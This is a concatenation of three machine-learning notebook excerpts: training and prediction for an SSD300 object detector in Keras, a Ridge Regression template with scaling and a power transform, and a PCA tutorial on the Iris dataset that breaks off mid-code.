ssd_input_encoder = SSDInputEncoder(img_height=img_height,
img_width=img_width,
n_classes=n_classes,
predictor_sizes=predictor_sizes,
scales=scales,
aspect_ratios_per_layer=aspect_ratios,
two_boxes_for_ar1=two_boxes_for_ar1,
steps=steps,
offsets=offsets,
clip_boxes=clip_boxes,
variances=variances,
matching_type='multi',
pos_iou_threshold=0.5,
neg_iou_limit=0.5,
normalize_coords=normalize_coords)
# 6: Create the generator handles that will be passed to Keras' `fit_generator()` function.
train_generator = train_dataset.generate(batch_size=batch_size,
shuffle=True,
transformations=[ssd_data_augmentation],
label_encoder=ssd_input_encoder,
returns={'processed_images',
'encoded_labels'},
keep_images_without_gt=False)
val_generator = val_dataset.generate(batch_size=batch_size,
shuffle=False,
transformations=[convert_to_3_channels,
resize],
label_encoder=ssd_input_encoder,
returns={'processed_images',
'encoded_labels'},
keep_images_without_gt=False)
# Get the number of samples in the training and validations datasets.
train_dataset_size = train_dataset.get_dataset_size()
val_dataset_size = val_dataset.get_dataset_size()
print("Number of images in the training dataset:\t{:>6}".format(train_dataset_size))
print("Number of images in the validation dataset:\t{:>6}".format(val_dataset_size))
```
## 4. Set the remaining training parameters
We've already chosen an optimizer and set the batch size above, now let's set the remaining training parameters. I'll set one epoch to consist of 1,000 training steps. The next code cell defines a learning rate schedule that replicates the learning rate schedule of the original Caffe implementation for the training of the SSD300 Pascal VOC "07+12" model. That model was trained for 120,000 steps with a learning rate of 0.001 for the first 80,000 steps, 0.0001 for the next 20,000 steps, and 0.00001 for the last 20,000 steps. If you're training on a different dataset, define the learning rate schedule however you see fit.
I'll set only a few essential Keras callbacks below, feel free to add more callbacks if you want TensorBoard summaries or whatever. We obviously need the learning rate scheduler and we want to save the best models during the training. It also makes sense to continuously stream our training history to a CSV log file after every epoch, because if we didn't do that, in case the training terminates with an exception at some point or if the kernel of this Jupyter notebook dies for some reason or anything like that happens, we would lose the entire history for the trained epochs. Finally, we'll also add a callback that makes sure that the training terminates if the loss becomes `NaN`. Depending on the optimizer you use, it can happen that the loss becomes `NaN` during the first iterations of the training. In later iterations it's less of a risk. For example, I've never seen a `NaN` loss when I trained SSD using an Adam optimizer, but I've seen a `NaN` loss a couple of times during the very first couple of hundred training steps of training a new model when I used an SGD optimizer.
```
# Define a learning rate schedule.
# def lr_schedule(epoch):
# if epoch < 80:
# return 0.001
# elif epoch < 100:
# return 0.0001
# else:
# return 0.00001
# Define a learning rate schedule.
def lr_schedule(epoch):
if epoch < 56:
return 0.001
elif epoch < 76:
return 0.0001
else:
return 0.00001
# Define model callbacks.
# TODO: Set the filepath under which you want to save the model.
model_checkpoint = ModelCheckpoint(filepath='ssd300_dropout_PASCAL2012_train_+12_epoch-{epoch:02d}_loss-{loss:.4f}_val_loss-{val_loss:.4f}.h5',
monitor='val_loss',
verbose=1,
save_best_only=True,
save_weights_only=False,
mode='auto',
period=1)
#model_checkpoint.best =
csv_logger = CSVLogger(filename='ssd300_dropout_pascal_07+12_training_log.csv',
separator=',',
append=True)
learning_rate_scheduler = LearningRateScheduler(schedule=lr_schedule,
verbose=1)
terminate_on_nan = TerminateOnNaN()
callbacks = [model_checkpoint,
csv_logger,
learning_rate_scheduler,
terminate_on_nan]
```
## 5. Train
In order to reproduce the training of the "07+12" model mentioned above, at 1,000 training steps per epoch you'd have to train for 120 epochs. That is going to take really long though, so you might not want to do all 120 epochs in one go and instead train only for a few epochs at a time. You can find a summary of a full training [here](https://github.com/pierluigiferrari/ssd_keras/blob/master/training_summaries/ssd300_pascal_07%2B12_training_summary.md).
In order to only run a partial training and resume smoothly later on, there are a few things you should note:
1. Always load the full model if you can, rather than building a new model and loading previously saved weights into it. Optimizers like SGD or Adam keep running averages of past gradient moments internally. If you always save and load full models when resuming a training, then the state of the optimizer is maintained and the training picks up exactly where it left off. If you build a new model and load weights into it, the optimizer is being initialized from scratch, which, especially in the case of Adam, leads to small but unnecessary setbacks every time you resume the training with previously saved weights.
2. In order for the learning rate scheduler callback above to work properly, `fit_generator()` needs to know which epoch we're in, otherwise it will start with epoch 0 every time you resume the training. Set `initial_epoch` to be the next epoch of your training. Note that this parameter is zero-based, i.e. the first epoch is epoch 0. If you had trained for 10 epochs previously and now you'd want to resume the training from there, you'd set `initial_epoch = 10` (since epoch 10 is the eleventh epoch). Furthermore, set `final_epoch` to the last epoch you want to run. To stick with the previous example, if you had trained for 10 epochs previously and now you'd want to train for another 10 epochs, you'd set `initial_epoch = 10` and `final_epoch = 20`.
3. In order for the model checkpoint callback above to work correctly after a kernel restart, set `model_checkpoint.best` to the best validation loss from the previous training. If you don't do this and a new `ModelCheckpoint` object is created after a kernel restart, that object obviously won't know what the last best validation loss was, so it will always save the weights of the first epoch of your new training and record that loss as its new best loss. This isn't super-important, I just wanted to mention it.
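The epoch bookkeeping in point 2 can be encoded in a small hypothetical helper (not part of the repository) to avoid off-by-one mistakes with the zero-based epoch convention:

```python
# Hypothetical helper: given the number of epochs already completed and how many
# more epochs to train, return the (initial_epoch, final_epoch) pair expected by
# `fit_generator()`. `initial_epoch` is zero-based, so after completing 10
# epochs the next one is epoch 10.
def resume_epochs(epochs_completed, epochs_to_run):
    initial_epoch = epochs_completed
    final_epoch = epochs_completed + epochs_to_run
    return initial_epoch, final_epoch

# The example from the notes above: 10 epochs done, train 10 more.
print(resume_epochs(10, 10))  # -> (10, 20)
```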
```
# If you're resuming a previous training, set `initial_epoch` and `final_epoch` accordingly.
initial_epoch = 0
final_epoch = 120
steps_per_epoch = 1000
history = model.fit_generator(generator=train_generator,
steps_per_epoch=steps_per_epoch,
epochs=final_epoch,
callbacks=callbacks,
validation_data=val_generator,
validation_steps=ceil(val_dataset_size/batch_size),
initial_epoch=initial_epoch)
```
## 6. Make predictions
Now let's make some predictions on the validation dataset with the trained model. For convenience we'll use the validation generator that we've already set up above. Feel free to change the batch size.
You can set the `shuffle` option to `False` if you would like to check the model's progress on the same image(s) over the course of the training.
```
# 1: Set the generator for the predictions.
predict_generator = val_dataset.generate(batch_size=1,
shuffle=False,
transformations=[convert_to_3_channels,
resize],
label_encoder=None,
returns={'processed_images',
'filenames',
'inverse_transform',
'original_images',
'original_labels'},
keep_images_without_gt=False)
# 2: Generate samples.
batch_images, batch_filenames, batch_inverse_transforms, batch_original_images, batch_original_labels = next(predict_generator)
i = 0 # Which batch item to look at
print("Image:", batch_filenames[i])
print()
print("Ground truth boxes:\n")
print(np.array(batch_original_labels[i]))
plt.imshow(batch_images[i])
# 3: Make predictions.
# TODO: wrap in for loop for N iterations
# Results of each should be different, i.e. should get a number of different predictions (e.g. take 1 = 2 detections, take 2 = 3)
# Should be (but not always) a lot of overlap
# Need to process them - partitioning detections into observations
# Find high IOU areas
y_pred = model.predict(batch_images)
```
Now let's decode the raw predictions in `y_pred`.
Had we created the model in 'inference' or 'inference_fast' mode, then the model's final layer would be a `DecodeDetections` layer and `y_pred` would already contain the decoded predictions, but since we created the model in 'training' mode, the model outputs raw predictions that still need to be decoded and filtered. This is what the `decode_detections()` function is for. It does exactly what the `DecodeDetections` layer would do, but using Numpy instead of TensorFlow (i.e. on the CPU instead of the GPU).
`decode_detections()` with default argument values follows the procedure of the original SSD implementation: First, a very low confidence threshold of 0.01 is applied to filter out the majority of the predicted boxes, then greedy non-maximum suppression is performed per class with an intersection-over-union threshold of 0.45, and out of what is left after that, the top 200 highest confidence boxes are returned. Those settings are for precision-recall scoring purposes though. In order to get some usable final predictions, we'll set the confidence threshold much higher, e.g. to 0.5, since we're only interested in the very confident predictions.
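The greedy non-maximum suppression step described above can be sketched in NumPy. This is a simplified single-class version for illustration, not the repository's `decode_detections()`:

```python
import numpy as np

def iou(box, boxes):
    # Intersection-over-union of one box against an array of boxes,
    # all in (xmin, ymin, xmax, ymax) format.
    xmin = np.maximum(box[0], boxes[:, 0])
    ymin = np.maximum(box[1], boxes[:, 1])
    xmax = np.minimum(box[2], boxes[:, 2])
    ymax = np.minimum(box[3], boxes[:, 3])
    inter = np.clip(xmax - xmin, 0, None) * np.clip(ymax - ymin, 0, None)
    area = (box[2] - box[0]) * (box[3] - box[1])
    areas = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])
    return inter / (area + areas - inter)

def greedy_nms(boxes, scores, iou_threshold=0.45):
    # Keep the highest-scoring box, drop everything that overlaps it by more
    # than `iou_threshold`, then repeat on the remainder.
    order = np.argsort(scores)[::-1]
    keep = []
    while order.size > 0:
        best = order[0]
        keep.append(best)
        rest = order[1:]
        order = rest[iou(boxes[best], boxes[rest]) <= iou_threshold]
    return keep

boxes = np.array([[10, 10, 50, 50], [12, 12, 52, 52], [100, 100, 140, 140]], dtype=float)
scores = np.array([0.9, 0.8, 0.7])
print(greedy_nms(boxes, scores))  # the second box overlaps the first heavily and is suppressed
```

With an IoU threshold of 0.45 as in the original implementation, heavily overlapping detections of the same class collapse to the single highest-confidence box.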
```
print(y_pred)
print(y_pred.shape)
# 4: Decode the raw predictions in `y_pred`.
y_pred_decoded = decode_detections(y_pred,
confidence_thresh=0.5,
iou_threshold=0.4,
top_k=200,
normalize_coords=normalize_coords,
img_height=img_height,
img_width=img_width)
```
We made the predictions on the resized images, but we'd like to visualize the outcome on the original input images, so we'll convert the coordinates accordingly. Don't worry about the opaque `apply_inverse_transforms()` function below; in this simple case it just applies `(* original_image_size / resized_image_size)` to the box coordinates.
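To make that coordinate conversion concrete, here is the resize-only case written out in NumPy (the image sizes below are made up for the example):

```python
import numpy as np

# Boxes predicted on a resized image are mapped back to the original image by
# scaling each coordinate by original_size / resized_size.
resized_h, resized_w = 300, 300
original_h, original_w = 600, 900

box = np.array([30.0, 60.0, 150.0, 240.0])  # (xmin, ymin, xmax, ymax) on the resized image
scale = np.array([original_w / resized_w, original_h / resized_h,
                  original_w / resized_w, original_h / resized_h])
print(box * scale)  # the same box in original-image coordinates
```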
```
# 5: Convert the predictions for the original image.
y_pred_decoded_inv = apply_inverse_transforms(y_pred_decoded, batch_inverse_transforms)
np.set_printoptions(precision=2, suppress=True, linewidth=90)
print("Predicted boxes:\n")
print(' class conf xmin ymin xmax ymax')
print(y_pred_decoded_inv[i])
```
Finally, let's draw the predicted boxes onto the image. Each predicted box shows its confidence next to the category name. The ground truth boxes are also drawn onto the image in green for comparison.
```
# 6: Draw the predicted boxes onto the image
# Set the colors for the bounding boxes
colors = plt.cm.hsv(np.linspace(0, 1, n_classes+1)).tolist()
classes = ['background',
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat',
'chair', 'cow', 'diningtable', 'dog',
'horse', 'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor']
plt.figure(figsize=(20,12))
plt.imshow(batch_original_images[i])
current_axis = plt.gca()
for box in batch_original_labels[i]:
xmin = box[1]
ymin = box[2]
xmax = box[3]
ymax = box[4]
label = '{}'.format(classes[int(box[0])])
current_axis.add_patch(plt.Rectangle((xmin, ymin), xmax-xmin, ymax-ymin, color='green', fill=False, linewidth=2))
current_axis.text(xmin, ymin, label, size='x-large', color='white', bbox={'facecolor':'green', 'alpha':1.0})
for box in y_pred_decoded_inv[i]:
xmin = box[2]
ymin = box[3]
xmax = box[4]
ymax = box[5]
color = colors[int(box[0])]
label = '{}: {:.2f}'.format(classes[int(box[0])], box[1])
current_axis.add_patch(plt.Rectangle((xmin, ymin), xmax-xmin, ymax-ymin, color=color, fill=False, linewidth=2))
current_axis.text(xmin, ymin, label, size='x-large', color='white', bbox={'facecolor':color, 'alpha':1.0})
model.summary()
```
# RidgeRegression with Scale & Power Transformer
This code template performs regression analysis using simple Ridge Regression with the feature-rescaling technique <Code>scale</Code> and the feature-transformation technique <Code>PowerTransformer</Code> in a pipeline. Ridge Regression is also known as Tikhonov regularization.
### Required Packages
```
import warnings
import numpy as np
import pandas as pd
import seaborn as se
import matplotlib.pyplot as plt
from sklearn.linear_model import Ridge
from sklearn.pipeline import Pipeline,make_pipeline
from sklearn.preprocessing import scale,PowerTransformer
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error
warnings.filterwarnings('ignore')
```
### Initialization
Filepath of CSV file
```
#filepath
file_path= ""
```
List of features required for model training.
```
#x_values
features=[]
```
Target feature for prediction.
```
#y_value
target=''
```
### Data Fetching
Pandas is an open-source, BSD-licensed library providing high-performance, easy-to-use data manipulation and data analysis tools.
We will use the pandas library to read the CSV file from its storage path, and use the head function to display the first few rows.
```
df=pd.read_csv(file_path)
df.head()
```
### Feature Selections
Feature selection is the process of reducing the number of input variables when developing a predictive model. It reduces the computational cost of modelling and, in some cases, improves the performance of the model.
We will assign all the required input features to X and target/outcome to Y.
```
X=df[features]
Y=df[target]
```
### Data Preprocessing
Since most of the machine learning models in the sklearn library don't handle string categorical data or null values, we have to explicitly remove or replace them. The snippet below defines functions that replace any null values and encode string categorical columns as integer/dummy variables.
```
def NullClearner(df):
    # Numeric columns: fill null values with the column mean.
    if(isinstance(df, pd.Series) and (df.dtype in ["float64","int64"])):
        df.fillna(df.mean(),inplace=True)
        return df
    # Categorical columns: fill null values with the most frequent value.
    elif(isinstance(df, pd.Series)):
        df.fillna(df.mode()[0],inplace=True)
        return df
    else:
        return df
def EncodeX(df):
    # One-hot encode any string/categorical columns.
    return pd.get_dummies(df)
```
Calling preprocessing functions on the feature and target set.
```
x=X.columns.to_list()
for i in x:
X[i]=NullClearner(X[i])
X=EncodeX(X)
Y=NullClearner(Y)
X.head()
```
#### Correlation Map
In order to check the correlation between the features, we will plot a correlation matrix. It is effective in summarizing a large amount of data where the goal is to see patterns.
```
f,ax = plt.subplots(figsize=(18, 18))
matrix = np.triu(X.corr())
se.heatmap(X.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax, mask=matrix)
plt.show()
```
### Data Splitting
The train-test split is a procedure for evaluating the performance of an algorithm. The procedure involves taking a dataset and dividing it into two subsets. The first subset is utilized to fit/train the model. The second subset is used for prediction. The main motive is to estimate the performance of the model on new data.
```
x_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.2,random_state=123)
```
### Data Rescaling
<Code>scale</Code> standardizes a dataset along any axis: it standardizes features by removing the mean and scaling to unit variance.
<Code>scale</Code> applies the same transformation as <Code>StandardScaler</Code>, but unlike StandardScaler it is a plain function without the Transformer API, i.e., it has no <Code>fit</Code>, <Code>transform</Code> or <Code>fit_transform</Code> methods, so it cannot be used inside a pipeline.
```
x_train =scale(x_train)
x_test = scale(x_test)
```
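To make the behaviour of <Code>scale</Code> concrete, here is the same standardization written out in NumPy on a small made-up matrix:

```python
import numpy as np

# What `scale` computes: subtract the column mean, divide by the column
# standard deviation, so each feature ends up with mean 0 and variance 1.
X = np.array([[1.0, 10.0], [2.0, 20.0], [3.0, 30.0], [4.0, 40.0]])
X_std = (X - X.mean(axis=0)) / X.std(axis=0)

print(X_std.mean(axis=0))  # ~0 per column
print(X_std.std(axis=0))   # 1 per column
```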
### Feature Transformation
Power transforms are a family of parametric, monotonic transformations that are applied to make data more Gaussian-like. This is useful for modeling issues related to heteroscedasticity (non-constant variance), or other situations where normality is desired.
##### For more information on PowerTransformer [ click here](https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.PowerTransformer.html)
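A quick sketch of what <Code>PowerTransformer</Code> does to a skewed feature, using its default Yeo-Johnson method on made-up lognormal data:

```python
import numpy as np
from sklearn.preprocessing import PowerTransformer

# A right-skewed (lognormal) feature becomes much more Gaussian-like after
# the power transform.
rng = np.random.RandomState(0)
x = rng.lognormal(mean=0.0, sigma=1.0, size=(1000, 1))

pt = PowerTransformer()  # method='yeo-johnson', standardize=True by default
x_t = pt.fit_transform(x)

# After the transform the feature is standardized and far less skewed.
print(x.std(), x_t.std())
```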
### Model
Ridge regression addresses some of the problems of Ordinary Least Squares by imposing a penalty on the size of the coefficients. The ridge coefficients minimize a penalized residual sum of squares:
\begin{equation*}
\min_{w} || X w - y||_2^2 + \alpha ||w||_2^2
\end{equation*}
The complexity parameter $\alpha$ controls the amount of shrinkage: the larger the value of $\alpha$, the greater the amount of shrinkage and thus the coefficients become more robust to collinearity.
This model solves a regression model where the loss function is the linear least squares function and regularization is given by the l2-norm. Also known as Ridge Regression or Tikhonov regularization. This estimator has built-in support for multi-variate regression (i.e., when y is a 2d-array of shape (n_samples, n_targets)).
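The penalized objective above has a well-known closed-form solution, $w = (X^T X + \alpha I)^{-1} X^T y$. Here is a NumPy sketch on toy data (for the math only; sklearn's `Ridge` also handles the intercept and offers several solvers):

```python
import numpy as np

# Toy data with known coefficients plus a little noise.
rng = np.random.RandomState(123)
X = rng.randn(50, 3)
y = X @ np.array([1.0, -2.0, 0.5]) + 0.1 * rng.randn(50)

def ridge_coef(X, y, alpha):
    # Closed-form ridge solution: (X^T X + alpha * I)^(-1) X^T y
    p = X.shape[1]
    return np.linalg.solve(X.T @ X + alpha * np.eye(p), X.T @ y)

print(ridge_coef(X, y, alpha=0.0))   # ~ordinary least squares solution
print(ridge_coef(X, y, alpha=10.0))  # coefficients shrunk toward zero
```

Increasing `alpha` visibly pulls the coefficient vector toward zero, which is the shrinkage behaviour described above.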
#### Model Tuning Parameters
> **alpha** -> Regularization strength; must be a positive float. Regularization improves the conditioning of the problem and reduces the variance of the estimates. Larger values specify stronger regularization.
> **solver** -> Solver to use in the computational routines {‘auto’, ‘svd’, ‘cholesky’, ‘lsqr’, ‘sparse_cg’, ‘sag’, ‘saga’}
```
model=make_pipeline(PowerTransformer(), Ridge(random_state=123))
model.fit(x_train,y_train)
```
#### Model Accuracy
We will use the trained model to make predictions on the test set, then use the predicted values to measure the accuracy of our model.
> **score**: The **score** function returns the coefficient of determination <code>R<sup>2</sup></code> of the prediction.
```
y_pred=model.predict(x_test)
print("Accuracy score {:.2f} %\n".format(model.score(x_test,y_test)*100))
```
> **r2_score**: The **r2_score** function computes the coefficient of determination, i.e. the proportion of variance in the target that is explained by our model.
> **mae**: The **mean absolute error** function calculates the total error as the average absolute distance between the real data and the predicted data.
> **mse**: The **mean squared error** function squares the errors before averaging, penalizing the model more heavily for large errors.
```
print("R2 Score: {:.2f} %".format(r2_score(y_test,y_pred)*100))
print("Mean Absolute Error {:.2f}".format(mean_absolute_error(y_test,y_pred)))
print("Mean Squared Error {:.2f}".format(mean_squared_error(y_test,y_pred)))
```
#### Prediction Plot
First, we plot the actual observations: the first 20 test-set target values against their record number, shown in green.
For the predictions, we plot the model's output for the same 20 test records in red.
```
plt.figure(figsize=(14,10))
plt.plot(range(20),y_test[0:20], color = "green")
plt.plot(range(20),model.predict(x_test[0:20]), color = "red")
plt.legend(["Actual","prediction"])
plt.title("Predicted vs True Value")
plt.xlabel("Record number")
plt.ylabel(target)
plt.show()
```
#### Creator: Ganapathi Thota , Github: [Profile](https://github.com/Shikiz)
# Understanding Principal Component Analysis
**Outline**
* [Introduction](#intro)
* [Assumption and derivation](#derive)
* [PCA Example](#example)
* [PCA Usage](#usage)
```
%load_ext watermark
%matplotlib inline
# %config InlineBackend.figure_format='retina'
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import math
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.metrics import accuracy_score
%watermark -a 'Johnny' -d -t -v -p numpy,pandas,matplotlib,sklearn
```
---
## <a id="intro">Introduction</a>
When we have two features that are highly correlated with each other, we may not want to include both of them in our model. In [Lasso and Ridge regression](http://nbviewer.jupyter.org/github/johnnychiuchiu/Machine-Learning/blob/master/LinearRegression/linearRegressionModelBuilding.ipynb#ridge), we fit a model with all the predictors but add a penalty term, the L1 or L2 norm of the regression coefficients, which shrinks the coefficient estimates towards zero. In other words, these methods effectively pick some predictors out of all the predictors in order to reduce the dimension of our column space.
Principal Component Analysis (PCA) is another type of dimension reduction method. What PCA is all about is **finding the directions of maximum variance in high-dimensional data and projecting it onto a smaller dimensional subspace while retaining most of the information.** The main idea and motivation is that each of the $n$ observations lives in $p$-dimensional space, but not all of these dimensions are equally interesting. PCA seeks a small number of dimensions that are as interesting as possible, where *interesting* is measured by the amount that the observations vary along each dimension.
Note that PCA is just a linear transformation method. It projects our high-dimensional data onto a new set of directions, each of which captures the maximum remaining variance. In other words, the orthogonality of principal components implies that PCA finds the most uncorrelated components to explain as much variation in the data as possible. We can then pick the number of directions, i.e. components, we want to keep while retaining most of the information in the original data. The direction of highest variance is called the first principal component, the direction of second highest variance is called the second principal component, and so on.
In PCA, the first principal component is obtained by the eigendecomposition of the covariance matrix of $X$: the eigenvector with the largest eigenvalue is the first principal component, in the sense that vectors in its span are stretched by the largest factor, since eigenvalues are the factors by which eigenvectors stretch or squish during the transformation. Therefore, we can pick the top k components by sorting the eigenvalues obtained from the eigendecomposition of the covariance matrix of $X$.
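A tiny NumPy check of that claim, on made-up data that is deliberately stretched along one axis:

```python
import numpy as np

# Generate centered 2-D data with much more variance along the first axis.
rng = np.random.RandomState(0)
X = rng.randn(500, 2) @ np.array([[3.0, 0.0], [0.0, 0.5]])
X = X - X.mean(axis=0)

# Eigendecomposition of the covariance matrix (eigh returns ascending eigenvalues).
C = np.cov(X, rowvar=False)
eigvals, eigvecs = np.linalg.eigh(C)
top = eigvecs[:, np.argmax(eigvals)]  # eigenvector with the largest eigenvalue

# Variance of the projection onto `top` vs. onto another unit vector.
var_top = (X @ top).var()
var_other = (X @ np.array([0.0, 1.0])).var()
print(var_top, var_other)  # var_top is by far the larger one
```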
**Application of PCA**
* We can use PCA as a tool for data visualization. For instance, if we can obtain a two-dimensional representation of the data that captures most of the information, then we can plot the observations in this low-dimensional space.
* We can use principal components as predictors in a regression model in place of the original larger set of variables.
---
## <a id="derive">Assumption and derivation</a>
**Assumption** for PCA before we derive the whole process are
* Since we are only interested in variance, we assume that each of the variables in $X$ has been centered to have mean zero, i.e., the column means of $X$ are zero.
**Method Derivation**
Assume we have n observations and a set of features $X1, X2, X3, \dots, Xp$. In other words, we have
\begin{pmatrix}
x_{1,1} & x_{1,2} & \cdots & x_{1,p} \\
x_{2,1} & x_{2,2} & \cdots & x_{2,p} \\
\vdots & \vdots & \ddots & \vdots \\
x_{n,1} & x_{n,2} & \cdots & x_{n,p}
\end{pmatrix}
where
\begin{equation*}
X1 = \begin{bmatrix}
x_{1,1} \\
x_{2,1} \\
\vdots \\
x_{n,1}
\end{bmatrix}
\end{equation*}
PCA will try to find a low dimensional representation of a dataset that contains as much as possible of the variance. The idea is that each of the n observations lives in p-dimensional space, but not all of these dimensions are equally interesting. PCA seeks a small number of dimensions that are as interesting as possible. Let's see how these dimensions, or *principal components*, are found.
Given $n \times p$ data set $X$, how do we compute the first principal component? We look for the linear combination of the sample feature values of the form
$$z_{i,1} = \phi_{1,1}x_{i,1}+\phi_{2,1}x_{i,2}+\dots+\phi_{p,1}x_{i,p}$$
where
$1 \le i \le n$ and $\phi_1$ denotes the first principal component loading vector, which is
\begin{equation*}
\phi_1=\begin{pmatrix}
\phi_{1,1} \\
\phi_{2,1} \\
\vdots \\
\phi_{p,1}
\end{pmatrix}
\end{equation*}
We'll have n values of $z_1$, and we want to look for the linear combination that has the largest sample variance. More formally,
\begin{equation*}
Z_1
=
\begin{pmatrix}
z_{1,1} \\
z_{2,1} \\
\vdots \\
z_{n,1}
\end{pmatrix}
=
\begin{pmatrix}
\phi_{1,1}x_{1,1} + \phi_{2,1}x_{1,2} + \cdots + \phi_{p,1}x_{1,p} \\
\phi_{1,1}x_{2,1} + \phi_{2,1}x_{2,2} + \cdots + \phi_{p,1}x_{2,p} \\
\vdots \\
\phi_{1,1}x_{n,1} + \phi_{2,1}x_{n,2} + \cdots + \phi_{p,1}x_{n,p}
\end{pmatrix}
=
\begin{pmatrix}
\phi_{1,1}
\phi_{2,1}
\dots
\phi_{p,1}
\end{pmatrix}
\begin{pmatrix}
x_{1,1} & x_{1,2} & \cdots & x_{1,p} \\
x_{2,1} & x_{2,2} & \cdots & x_{2,p} \\
\vdots & \vdots & \ddots & \vdots \\
x_{n,1} & x_{n,2} & \cdots & x_{n,p}
\end{pmatrix}
=
\phi_{1,1}X_{1}+\phi_{2,1}X_{2}+\dots+\phi_{p,1}X_{p}
=
\phi_1^T X
\end{equation*}
We assume that each of the variables in $X$ has been centered to have mean zero, i.e., the column means of $X$ are zero. Therefore, $E(X_i)=0$ for i in 1,...p. It's obvious to know that $E(Z_1)=E(\phi_{1,1}X_{1}+\phi_{2,1}X_{2}+\dots+\phi_{p,1}X_{p}) = 0$
Therefore, the variance of $Z_1$ is
$$Var(Z_1) = E\Big[[Z_1-E(Z_1)][Z_1-E(Z_1)]^T\Big] = E\Big[Z_1 Z_1^T \Big] = E\Big[(\phi_1^T X) (\phi_1^T X)^T \Big] = E\Big[\phi_1^T X X^T \phi_1\Big] = \phi_1^T E[X X^T] \phi_1$$
We also know that the [covariance matrix](https://en.wikipedia.org/wiki/Covariance_matrix) of X is
$$C = Cov(X) = E\Big[[X-E(X)][X-E(X)]^T\Big] = E[X X^T]$$
Hence, the $Var(Z_1)= \phi_1^T E[X X^T] \phi_1 = \phi_1^T C \phi_1$
Apart from finding the largest sample variance, we also constrain the loadings so that their sum of squares is equal to one, since otherwise setting these elements to be arbitrarily large in absolute value could result in an arbitrarily large variance. More formally,
$$\sum_{j=1}^{p}\phi_{j1}^2=1$$
In other words, the first principal component loading vector solves the optimization problem
$$\text{maximize}_{\phi_1} \quad \phi_1^T C \phi_1$$
$$\text{subject to} \quad \sum_{j=1}^{p}\phi_{j1}^2 = \phi_1^T \phi_1 =1$$
This constrained objective can be solved with a Lagrange multiplier, by optimizing the Lagrangian:
$$L = \phi_1^T C\phi_1 - \lambda(\phi_1^T \phi_1-1)$$
Next, to solve for $\phi_1$, we set the partial derivative of L with respect to $\phi_1$ to 0 (the common factor of 2 cancels):
$$\frac{\partial L}{\partial \phi_1} = 2C\phi_1 - 2\lambda \phi_1 = 0 $$
$$ C\phi_1 = \lambda \phi_1 $$
Surprisingly, we see that this is actually an eigenvalue problem. To refresh our minds a little bit, here is a very good [youtube video](https://www.youtube.com/watch?v=PFDu9oVAE-g&index=14&list=PLZHQObOWTQDPD3MizzM2xVFitgF8hE_ab) explaining what eigenvalues and eigenvectors are in a very geometric way.
Therefore, from the equation above, we pick $\phi_1$ to be the eigenvector associated with the largest eigenvalue.
Also, most data can’t be well-described by a single principal component. Typically, we compute multiple principal components by computing all eigenvectors of the covariance matrix of $X$ and ranking them by their eigenvalues. After sorting the eigenpairs, the next question is “how many principal components are we going to choose for our new feature subspace?” A useful measure is the so-called “explained variance,” which can be calculated from the eigenvalues. The explained variance tells us how much information (variance) can be attributed to each of the principal components.
To sum up, here are the **steps that we take to perform a PCA analysis**
1. Standardize the data.
2. Obtain the Eigenvectors and Eigenvalues from the covariance matrix (technically the correlation matrix after performing the standardization).
3. Sort eigenvalues in descending order and choose the k eigenvectors that correspond to the k largest eigenvalues where k is the number of dimensions of the new feature subspace.
4. Projection onto the new feature space. During this step we will take the top k eigenvectors and use it to transform the original dataset X to obtain a k-dimensional feature subspace X′.
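The four steps above can be sketched directly in NumPy on random made-up data. This is a from-scratch version just to make the recipe concrete; the notebook itself uses sklearn's `PCA` next:

```python
import numpy as np

# Random data with correlated features.
rng = np.random.RandomState(42)
X = rng.randn(200, 4) @ rng.randn(4, 4)

# 1. Standardize the data.
X_std = (X - X.mean(axis=0)) / X.std(axis=0)

# 2. Obtain eigenvalues and eigenvectors of the covariance matrix.
C = np.cov(X_std, rowvar=False)
eigvals, eigvecs = np.linalg.eigh(C)

# 3. Sort eigenvalues in descending order and keep the top k eigenvectors.
order = np.argsort(eigvals)[::-1]
k = 2
W = eigvecs[:, order[:k]]  # p x k projection matrix

# 4. Project onto the new k-dimensional feature subspace.
X_proj = X_std @ W

explained = eigvals[order] / eigvals.sum()
print(explained)     # explained-variance ratio per component, descending
print(X_proj.shape)  # (200, 2)
```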
---
## <a id="example">PCA Analysis Example</a>
Let's use the classical IRIS data to illustrate the topics that we just covered, including
* What are the explained variance of each component? How many component should we pick?
* How will the scatter plot be if we plot in the dimension of first and second component?
```
# Read Data
df = pd.read_csv(
filepath_or_buffer='https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data',
header=None,
sep=',')
df.columns=['sepal_len', 'sepal_wid', 'petal_len', 'petal_wid', 'class']
df.dropna(how="all", inplace=True) # drops the empty line at file-end
df.tail()
# split data table into data X and class labels y
X = df.iloc[:,0:4].values
y = df.iloc[:,4].values
```
**EDA**
To get a feeling for how the 3 different flower classes are distributed along the 4 different features, let us visualize them via histograms.
```
def plot_iris():
label_dict = {1: 'Iris-Setosa',
2: 'Iris-Versicolor',
3: 'Iris-Virgnica'}
feature_dict = {0: 'sepal length [cm]',
1: 'sepal width [cm]',
2: 'petal length [cm]',
3: 'petal width [cm]'}
with plt.style.context('seaborn-whitegrid'):
plt.figure(figsize=(8, 6))
for cnt in range(4):
plt.subplot(2, 2, cnt+1)
for lab in ('Iris-setosa', 'Iris-versicolor', 'Iris-virginica'):
plt.hist(X[y==lab, cnt],
label=lab,
bins=10,
alpha=0.3,)
plt.xlabel(feature_dict[cnt])
plt.legend(loc='upper right', fancybox=True, fontsize=8)
plt.tight_layout()
plt.show()
plot_iris()
```
## Process
### 1. Standardize the data
```
# create a StandardScaler object
scaler = StandardScaler()
# fit and then transform to get the standardized dataset
scaler.fit(X)
X_std = scaler.transform(X)
```
### 2. Do eigendecomposition and sort eigenvalues in descending order
```
# n_components: Number of components to keep
# if n_components is not set all components are kept
my_pca = PCA(n_components=None)
my_pca.fit(X_std)
def plot_var_explained(var_exp, figsize=(6,4)):
"""variance explained per component plot"""
# get culmulative variance explained
